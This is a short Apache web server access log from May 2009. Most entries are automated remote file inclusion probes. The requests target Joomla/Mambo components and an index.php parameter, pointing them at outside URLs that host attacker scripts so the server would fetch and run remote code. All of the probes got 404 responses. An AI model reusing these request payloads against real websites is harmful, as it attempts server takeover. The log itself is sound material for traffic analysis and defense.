212.150.52.114 - - [16/May/2009:02:22:00 -0400] "GET /logs/access_log.Q108090400%20%20/index.php?pg=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:02:22:00 -0400] "GET /logs/index.php?pg=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
72.30.79.49 - - [16/May/2009:02:23:32 -0400] "GET /images/_notes/nav_store_fav_over_r1_c4.jpg.mno HTTP/1.0" 200 210 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.150.79.146 - - [16/May/2009:02:23:45 -0400] "GET /logs/access_log.Q108112700%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
194.181.2.29 - - [16/May/2009:02:24:01 -0400] "GET /logs/access_log.Q108112900/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.masuccessguy.com//docs/pifsystem???? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
88.84.128.40 - - [16/May/2009:02:24:10 -0400] "GET /logs/access_log.Q109011600//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
87.106.135.14 - - [16/May/2009:02:25:24 -0400] "GET /logs/access_log.Q109010200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:02:25:25 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
